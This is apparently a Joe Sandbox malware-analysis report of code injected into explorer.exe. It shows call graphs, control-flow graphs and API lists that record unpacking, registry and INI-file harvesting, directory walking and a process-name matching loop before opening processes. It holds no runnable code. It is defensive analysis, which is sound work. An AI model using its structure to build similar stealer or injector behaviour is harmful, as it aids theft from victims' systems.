RtlFreeHeap 1098->1102 1099->1090 1099->1097 1101 d33458 14 API calls 1099->1101 1104 d31860 RtlFreeHeap 1099->1104 1101->1099 1102->1093 1104->1099 1107 d31860 RtlFreeHeap 1107->1098 1109 d32793 1108->1109 1110 d32797 RegOpenKeyExW 1108->1110 1109->1110 1111 d327d5 RegQueryValueExW 1110->1111 1112 d3286b 1110->1112 1114 d3285b RegCloseKey 1111->1114 1116 d327fe 1111->1116 1113 d3288d 1112->1113 1115 d32774 RtlFreeHeap 1112->1115 1113->1092 1114->1112 1114->1113 1115->1113 1116->1114 1117 d3281a RegQueryValueExW 1116->1117 1118 d32851 1117->1118 1119 d32844 1117->1119 1120 d31860 RtlFreeHeap 1118->1120 1119->1114 1120->1119 1123 d328b9 1121->1123 1122 d32922 1122->1098 1127 d32700 1122->1127 1123->1122 1124 d31860 RtlFreeHeap 1123->1124 1126 d328df 1124->1126 1125 d32774 5 API calls 1125->1126 1126->1122 1126->1125 1128 d32712 1127->1128 1129 d31860 RtlFreeHeap 1128->1129 1130 d3271d 1129->1130 1130->1098 1131 d33254 1130->1131 1155 d3298c 1131->1155 1134 d3343a 1134->1107 1135 d3298c GetFileAttributesW 1138 d33295 1135->1138 1136 d3342c 1164 d330a8 1136->1164 1138->1134 1138->1136 1159 d32938 1138->1159 1141 d33304 GetPrivateProfileSectionNamesW 1142 d3340c 1141->1142 1153 d3331e 1141->1153 1143 d31860 RtlFreeHeap 1142->1143 1144 d33414 1143->1144 1145 d31860 RtlFreeHeap 1144->1145 1146 d3341c 1145->1146 1147 d31860 RtlFreeHeap 1146->1147 1148 d33424 1147->1148 1150 d31860 RtlFreeHeap 1148->1150 1149 d3334e GetPrivateProfileStringW 1151 d33379 GetPrivateProfileIntW 1149->1151 1149->1153 1150->1136 1151->1153 1152 d330a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1152->1153 1153->1142 1153->1149 1153->1152 1154 d31860 RtlFreeHeap 1153->1154 1154->1153 1156 d329a9 1155->1156 1157 d32999 1155->1157 1156->1134 1156->1135 1157->1156 1158 d3299e GetFileAttributesW 1157->1158 1158->1156 1160 d32945 1159->1160 1161 d32980 1159->1161 1160->1161 1162 d3294a CreateFileW 1160->1162 1161->1141 1161->1142 1162->1161 1163 d32972 CloseHandle 1162->1163 1163->1161 1165 d330cc 1164->1165 1166 d330f1 FindFirstFileW 1165->1166 1167 d33237 1166->1167 1171 d33117 1166->1171 1168 d31860 RtlFreeHeap 1167->1168 1169 d3323f 1168->1169 1170 d31860 RtlFreeHeap 1169->1170 1172 d33247 1170->1172 1173 d33210 FindNextFileW 1171->1173 1175 d31860 RtlFreeHeap 1171->1175 1177 d32700 RtlFreeHeap 1171->1177 1178 d330a8 RtlFreeHeap 1171->1178 1179 d31860 RtlFreeHeap 1171->1179 1180 d32f7c 1171->1180 1172->1134 1173->1171 1174 d33226 FindClose 1173->1174 1174->1167 1175->1173 1177->1171 1178->1171 1179->1171 1190 d32bc0 1180->1190 1184 d33086 1184->1171 1185 d3307e 1186 d31860 RtlFreeHeap 1185->1186 1186->1184 1187 d32e04 RtlFreeHeap 1188 d32fb6 1187->1188 1188->1184 1188->1185 1188->1187 1189 d31860 RtlFreeHeap 1188->1189 1189->1188 1191 d32bf3 1190->1191 1192 d32700 RtlFreeHeap 1191->1192 1193 d32c54 1192->1193 1194 d32a54 RtlFreeHeap 1193->1194 1195 d32c68 1194->1195 1196 d32c7e 1195->1196 1197 d31860 RtlFreeHeap 1195->1197 1198 d31860 RtlFreeHeap 1196->1198 1197->1196 1204 d32cb2 1198->1204 1199 d32da3 1200 d31860 RtlFreeHeap 1199->1200 1201 d32dd9 1200->1201 1202 d31860 RtlFreeHeap 1201->1202 1203 d32de1 1202->1203 1203->1184 1206 d32a54 1203->1206 1204->1199 1205 d31860 RtlFreeHeap 1204->1205 1205->1199 1207 d32a86 1206->1207 1208 d32ad9 1207->1208 1209 d31860 RtlFreeHeap 1207->1209 1208->1188 1209->1208 1210 d33608 1211 d33458 17 API calls 1210->1211 1212 d3363b 1211->1212 1213 d33458 17 API calls 1212->1213 1214 d3365d 1213->1214 1215 d3a1af 1216 d3a1bd 1215->1216 1217 d3a1cf 1216->1217 1218 d3a298 3 API calls 1216->1218 1218->1217

                                                                                                                                                                Callgraph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                • Disassembly available
                                                                                                                                                                callgraph 0 Function_00D318D0 1 Function_00D31AD4 2 Function_00D314D4 3 Function_00D39ADA 4 Function_00D39FC2 5 Function_00D329C0 31 Function_00D32688 5->31 6 Function_00D32BC0 6->31 53 Function_00D32A54 6->53 67 Function_00D31860 6->67 79 Function_00D32610 6->79 88 Function_00D32700 6->88 98 Function_00D31838 6->98 99 Function_00D31938 6->99 106 Function_00D3272C 6->106 7 Function_00D340C4 8 Function_00D336C8 21 Function_00D321E4 8->21 23 Function_00D318E8 8->23 8->67 80 Function_00D31B14 8->80 9 Function_00D340F2 10 Function_00D323F0 47 Function_00D323AC 10->47 11 Function_00D337F4 11->8 24 Function_00D322E8 11->24 38 Function_00D322B4 11->38 46 Function_00D322AC 11->46 51 Function_00D32354 11->51 61 Function_00D32570 11->61 74 Function_00D32B6C 11->74 93 Function_00D32308 11->93 105 Function_00D3372C 11->105 12 Function_00D340F4 13 Function_00D3A1F9 26 Function_00D3A298 13->26 14 Function_00D314F9 15 Function_00D318F8 16 Function_00D32AF8 16->98 17 Function_00D32EF8 17->79 18 Function_00D340FC 19 Function_00D3A1E0 19->26 20 Function_00D31DE0 60 Function_00D31A4C 20->60 21->67 21->98 101 Function_00D31E20 21->101 22 Function_00D340E4 25 Function_00D39C92 54 Function_00D3A25A 26->54 27 Function_00D32498 27->47 57 Function_00D32340 27->57 28 Function_00D3409C 29 Function_00D31980 30 Function_00D34084 31->98 32 Function_00D3298C 33 Function_00D31B8C 33->98 34 Function_00D3188C 34->98 35 Function_00D314B2 36 Function_00D338B0 36->1 36->36 36->98 37 Function_00D39EB4 39 Function_00D340BC 40 Function_00D328A0 64 Function_00D32774 40->64 40->67 40->98 41 Function_00D323A0 42 Function_00D399A7 43 Function_00D347A7 44 Function_00D330A8 44->16 44->31 44->44 65 Function_00D32F7C 44->65 44->67 44->88 44->106 45 Function_00D3A1AF 45->26 48 Function_00D340AC 49 Function_00D3A055 50 Function_00D33254 50->31 50->32 50->44 50->67 97 Function_00D32938 50->97 50->98 50->106 52 Function_00D31254 53->67 53->98 55 Function_00D33458 55->5 55->31 55->40 55->50 55->55 55->64 55->67 55->88 55->98 56 Function_00D31C40 58 Function_00D34144 59 Function_00D3234C 61->41 61->51 61->98 62 Function_00D31576 63 Function_00D3B074 64->64 64->67 64->98 65->6 65->17 65->53 65->67 90 Function_00D32E04 65->90 66 Function_00D3407C 67->1 68 Function_00D31560 69 Function_00D32360 70 Function_00D34064 71 Function_00D3416A 72 Function_00D33668 72->55 73 Function_00D3156C 74->27 81 Function_00D32514 74->81 75 Function_00D3406C 76 Function_00D39912 77 Function_00D31D10 77->15 77->98 78 Function_00D32410 78->10 78->47 79->98 80->98 81->10 81->41 81->51 81->59 81->69 82 Function_00D34214 83 Function_00D3141D 84 Function_00D3971C 85 Function_00D3411C 86 Function_00D34001 87 Function_00D31000 88->31 88->67 89 Function_00D31405 90->33 90->67 90->98 91 Function_00D34104 92 Function_00D31508 94 Function_00D33608 94->55 95 Function_00D3B00C 96 Function_00D39930 100 Function_00D31822 101->0 101->15 101->20 101->29 101->34 101->56 101->67 101->77 101->98 102 Function_00D3B124 103 Function_00D34124 104 Function_00D3B12C 105->67 105->98

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 184 d330a8-d330e3 call d32688 call d3272c 189 d330e5-d330e6 184->189 190 d330ec-d33111 call d32688 FindFirstFileW 184->190 189->190 193 d33237-d33252 call d31860 * 2 190->193 194 d33117-d33118 190->194 196 d3311f-d33124 194->196 198 d3312a-d3313e 196->198 199 d331ad-d331df call d32688 call d32700 196->199 205 d33210-d33220 FindNextFileW 198->205 206 d33144-d33158 198->206 214 d331e1-d331eb call d32af8 199->214 215 d33208-d3320b call d31860 199->215 205->196 208 d33226-d33230 FindClose 205->208 206->205 211 d3315e-d3316b call d3272c 206->211 208->193 219 d33176 211->219 220 d3316d-d33174 211->220 214->215 223 d331ed-d33203 call d32f7c 214->223 215->205 222 d33178-d331a8 call d32688 call d32700 call d330a8 call d31860 219->222 220->222 222->199 223->215
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                                • Instruction ID: d6eb17e84af514cf79b7acb104218dcca348f73fb7d508f495b5400fb023a337
                                                                                                                                                                • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                                • Instruction Fuzzy Hash: 5B419130718B4D5FDB94FB3898897BA73D2FBD8340F444A29A44AC3151EE78D90487A1

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 239 d338b0-d33907 call d31ad4 call d31838 NtUnmapViewOfSection call d3388c 248 d33911-d3391a 239->248 249 d33909-d3390c call d338b0 239->249 249->248
                                                                                                                                                                APIs
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL ref: 00D338F2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SectionUnmapView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 498011366-0
                                                                                                                                                                • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                                • Instruction ID: 1115b4739a6abb72ec3cbe490a77be77108f65912a29b09d9e447e9dc6757178
                                                                                                                                                                • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                                • Instruction Fuzzy Hash: 34F0E524F11A091BEF6C77BD695D33822C0EB58311F50092AB515C72D2DC3D8E458331

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExW.KERNELBASE ref: 00D327C7
                                                                                                                                                                • RegQueryValueExW.KERNELBASE ref: 00D327F4
                                                                                                                                                                • RegQueryValueExW.KERNELBASE ref: 00D3283A
                                                                                                                                                                • RegCloseKey.KERNELBASE ref: 00D32860
                                                                                                                                                                  • Part of subcall function 00D31860: RtlFreeHeap.NTDLL ref: 00D31880
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1641618270-0
                                                                                                                                                                • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                                • Instruction ID: c084f4260be30341d2a4d4a13496dcbe78746d5368d02dc412c955671cfc6145
                                                                                                                                                                • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                                • Instruction Fuzzy Hash: 5B31A53060CB498FE768DB28D45877A7BD0FBA8355F54062EE48AC2264DF34C8468752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 22 d3372c-d337ba call d31838 RegCreateKeyExW 26 d337d6-d337f0 call d31860 22->26 27 d337bc-d337cb RegCloseKey 22->27 27->26 28 d337cd-d337d3 27->28 28->26
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreate
                                                                                                                                                                • String ID: ?
                                                                                                                                                                • API String ID: 2932200918-1684325040
                                                                                                                                                                • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                                • Instruction ID: b62b6a1ff014cd2519a4bba967cf66a6149ef93d399b66b4262ec6e52a005a69
                                                                                                                                                                • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                                • Instruction Fuzzy Hash: 94118270618B4C8FD751DF69D48866AB7E1FB98345F540A2EE48AC3360DF38D985CB82

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 31 d3a298-d3a29b 32 d3a2a5-d3a2a9 31->32 33 d3a2b5 32->33 34 d3a2ab-d3a2b3 32->34 35 d3a2b7 33->35 36 d3a29d-d3a2a3 33->36 34->33 37 d3a2ba-d3a2c1 35->37 36->32 39 d3a2c3-d3a2cb 37->39 40 d3a2cd 37->40 39->40 40->37 41 d3a2cf-d3a2d2 40->41 42 d3a2e7-d3a2f4 41->42 43 d3a2d4-d3a2e2 41->43 57 d3a2f6-d3a2f8 42->57 58 d3a30e-d3a31c call d3a25a 42->58 44 d3a2e4-d3a2e5 43->44 45 d3a31e-d3a339 43->45 44->42 46 d3a36a-d3a36d 45->46 48 d3a372-d3a379 46->48 49 d3a36f-d3a370 46->49 51 d3a37f-d3a383 48->51 50 d3a351-d3a355 49->50 55 d3a357-d3a35a 50->55 56 d3a33b-d3a33e 50->56 53 d3a3e0-d3a3e9 51->53 54 d3a385-d3a39e LoadLibraryA 51->54 64 d3a3ec-d3a3f5 53->64 60 d3a39f-d3a3a6 54->60 55->48 62 d3a35c-d3a360 55->62 56->48 61 d3a340 56->61 63 d3a2fb-d3a302 57->63 58->32 60->51 66 d3a3a8 60->66 67 d3a341-d3a345 61->67 62->67 68 d3a362-d3a369 62->68 81 d3a304-d3a30a 63->81 82 d3a30c 63->82 69 d3a3f7-d3a3f9 64->69 70 d3a41a-d3a46a VirtualProtect * 2 64->70 72 d3a3b4-d3a3bc 66->72 73 d3a3aa-d3a3b2 66->73 67->50 74 d3a347-d3a349 67->74 68->46 76 d3a3fb-d3a40a 69->76 77 d3a40c-d3a418 69->77 71 d3a46e-d3a473 70->71 71->71 78 d3a475-d3a484 71->78 79 d3a3be-d3a3ca 72->79 73->79 74->50 80 d3a34b-d3a34f 74->80 76->64 77->76 85 d3a3d5-d3a3df 79->85 86 d3a3cc-d3a3d3 79->86 80->50 80->55 81->82 82->58 82->63 86->60
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE ref: 00D3A397
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00D3A441
                                                                                                                                                                • VirtualProtect.KERNELBASE ref: 00D3A45F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D39000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D39000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d39000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 895956442-0
                                                                                                                                                                • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                                • Instruction ID: e11c062a983505861510b581fde4c689dd20a05f73e04502ca81a5005b8a8266
                                                                                                                                                                • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                                • Instruction Fuzzy Hash: 6551573275891D4BCB24ABBC9CC43F5B3D1F759321F1C062AC4DAC3284EA59D84683A7

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 87 d33254-d33287 call d3298c 90 d3343a-d33456 87->90 91 d3328d-d33297 call d3298c 87->91 91->90 94 d3329d-d332aa call d3272c 91->94 97 d332b5 94->97 98 d332ac-d332b3 94->98 99 d332b7-d332c2 call d32688 97->99 98->99 102 d332c8-d332fe call d32688 call d31838 * 2 call d32938 99->102 103 d3342c-d33435 call d330a8 99->103 113 d33304-d33318 GetPrivateProfileSectionNamesW 102->113 114 d3340c-d33427 call d31860 * 4 102->114 103->90 113->114 115 d3331e-d33326 113->115 114->103 115->114 118 d3332c-d3332f 115->118 118->114 120 d33335-d33348 118->120 125 d333f0-d33406 120->125 126 d3334e-d33377 GetPrivateProfileStringW 120->126 125->114 125->118 126->125 128 d33379-d33398 GetPrivateProfileIntW 126->128 130 d333e5-d333eb call d330a8 128->130 131 d3339a-d333ad call d32688 128->131 130->125 135 d333c6-d333e3 call d330a8 call d31860 131->135 136 d333af-d333b3 131->136 135->125 137 d333b5-d333ba 136->137 138 d333bd-d333c4 136->138 137->138 138->135 138->136
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00D3298C: GetFileAttributesW.KERNELBASE ref: 00D3299E
                                                                                                                                                                • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00D3330F
                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00D3336F
                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 00D3338C
                                                                                                                                                                  • Part of subcall function 00D330A8: FindFirstFileW.KERNELBASE ref: 00D33104
                                                                                                                                                                  • Part of subcall function 00D31860: RtlFreeHeap.NTDLL ref: 00D31880
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 970345848-0
                                                                                                                                                                • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                                • Instruction ID: 48e2fbb621084c0f7c8e7b2638d60c9b22ad9a89f7a9dabda5b2439df50c0e6e
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                                • Instruction Fuzzy Hash: 3451D830718F0D4FEB59BB2CA85667973D2EB98300F48456DE40AC3296EE64DE4187B6

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • StrStrIW.KERNELBASE ref: 00D3347E
                                                                                                                                                                • RegOpenKeyExW.KERNELBASE ref: 00D3353F
                                                                                                                                                                • RegEnumKeyExW.KERNELBASE ref: 00D335D6
                                                                                                                                                                  • Part of subcall function 00D32774: RegOpenKeyExW.KERNELBASE ref: 00D327C7
                                                                                                                                                                  • Part of subcall function 00D32774: RegQueryValueExW.KERNELBASE ref: 00D327F4
                                                                                                                                                                  • Part of subcall function 00D32774: RegQueryValueExW.KERNELBASE ref: 00D3283A
                                                                                                                                                                  • Part of subcall function 00D32774: RegCloseKey.KERNELBASE ref: 00D32860
                                                                                                                                                                  • Part of subcall function 00D33254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00D3330F
                                                                                                                                                                  • Part of subcall function 00D31860: RtlFreeHeap.NTDLL ref: 00D31880
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1841478724-0
                                                                                                                                                                • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                                • Instruction ID: 9d1b30db6feba2e20116569db840c9256549f85a1d2ad1bb3e1c78511d0b950e
                                                                                                                                                                • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                                • Instruction Fuzzy Hash: 2F417A30B18B0D4FDB98EF6D849972AB6E2FB98341F44456EA14EC3261DF34D9448B62

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 232 d32938-d32943 233 d32945-d32948 232->233 234 d32984 232->234 233->234 235 d3294a-d32970 CreateFileW 233->235 236 d32986-d3298b 234->236 237 d32972-d3297a CloseHandle 235->237 238 d32980-d32982 235->238 237->238 238->236
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3498533004-0
                                                                                                                                                                • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                                                • Instruction ID: 54009efc2533620cff00001242c7dd9efdb40ca982275898c5cca7ce181336e1
                                                                                                                                                                • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                                                • Instruction Fuzzy Hash: 54F02B7065570A4FE7446FB84498336B5D0FB08315F1C473DE49AC22D0D734C8428B22

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 251 d322b4-d322c6 252 d322d6-d322e6 251->252 253 d322c8-d322d0 CreateStreamOnHGlobal 251->253 253->252
                                                                                                                                                                APIs
                                                                                                                                                                • CreateStreamOnHGlobal.COMBASE ref: 00D322D0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateGlobalStream
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2244384528-0
                                                                                                                                                                • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                                • Instruction ID: 165586a3aa49251232a70bbad1e9e3f0e480b6d5128ea9c387fe1e176c7582b6
                                                                                                                                                                • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                                • Instruction Fuzzy Hash: 76E08C30109B0A8FD758AFBCE4CA07A33A1EB9C252B09053EE005CB114D27988C18751

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 254 d3298c-d32997 255 d329b5 254->255 256 d32999-d3299c 254->256 258 d329b7-d329bc 255->258 256->255 257 d3299e-d329a7 GetFileAttributesW 256->257 259 d329b1-d329b3 257->259 260 d329a9-d329af 257->260 259->258 260->259
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE ref: 00D3299E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                                • Instruction ID: 575d9e528527d531e21e324578a4325142a76f405fcc397ad41b243265c6f277
                                                                                                                                                                • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                                • Instruction Fuzzy Hash: 62D0A732F52905077B6426F90CDD37130A0D71932AF1C033AEA36C12E0E2D5CCD5A631

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 261 d31860-d31870 call d31ad4 264 d31872-d31880 RtlFreeHeap 261->264 265 d31886-d3188b 261->265 264->265
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.2384765301.0000000000D31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_d31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                                • Instruction ID: d4c9b74b2d520a44580a1d4440cca1da7498c5e01c79460fbe0a42b3af79cbee
                                                                                                                                                                • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                                • Instruction Fuzzy Hash: 97D01228716A090BEF2CBBFA1C8D174BAD2E758212F1C8065B819C3251DD39C895C365

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:10.3%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                                                Signature Coverage:27.5%
                                                                                                                                                                Total number of Nodes:306
                                                                                                                                                                Total number of Limit Nodes:42
                                                                                                                                                                execution_graph 708 c21000 709 c21010 708->709 710 c21007 708->710 712 c21016 710->712 762 c22608 VirtualQuery 712->762 715 c21097 715->709 717 c2102c RtlMoveMemory 718 c21071 GetCurrentProcessId 717->718 719 c2104d 717->719 723 c21092 718->723 724 c2109e 718->724 799 c22861 GetProcessHeap RtlAllocateHeap 719->799 721 c21052 RtlMoveMemory 721->718 723->715 726 c21095 723->726 765 c210a4 724->765 800 c21332 726->800 727 c210a3 729 c22861 GetProcessHeap RtlAllocateHeap 727->729 730 c210cc 729->730 731 c210dc CreateToolhelp32Snapshot 730->731 732 c21322 Sleep 731->732 733 c210f0 Process32First 731->733 732->731 734 c2131b CloseHandle 733->734 735 c2110c lstrcmpiA 733->735 734->732 736 c21124 lstrcmpiA 735->736 759 c21280 735->759 737 c21138 lstrcmpiA 736->737 736->759 739 c2114c lstrcmpiA 737->739 737->759 738 c225ad OpenProcess IsWow64Process IsWow64Process CloseHandle 738->759 740 c21160 lstrcmpiA 739->740 739->759 742 c21170 lstrcmpiA 740->742 740->759 741 c21305 Process32Next 741->735 743 c21319 741->743 744 c21184 lstrcmpiA 742->744 742->759 743->734 745 c21198 lstrcmpiA 744->745 744->759 746 c211ac lstrcmpiA 745->746 745->759 747 c211c0 lstrcmpiA 746->747 746->759 748 c211d4 lstrcmpiA 747->748 747->759 749 c211e8 lstrcmpiA 748->749 748->759 751 c211fc lstrcmpiA 749->751 749->759 750 c22608 VirtualQuery 750->759 752 c2120c lstrcmpiA 751->752 751->759 754 c2121c lstrcmpiA 752->754 752->759 753 c212ae lstrcmpiA 753->759 755 c2122c lstrcmpiA 754->755 754->759 756 c2123c lstrcmpiA 755->756 755->759 758 c2124c lstrcmpiA 756->758 756->759 757 c21819 30 API calls 757->759 758->759 760 c2125c lstrcmpiA 758->760 759->738 759->741 759->750 759->753 759->757 760->759 761 c2126c lstrcmpiA 760->761 761->741 761->759 763 c2101e 762->763 763->715 764 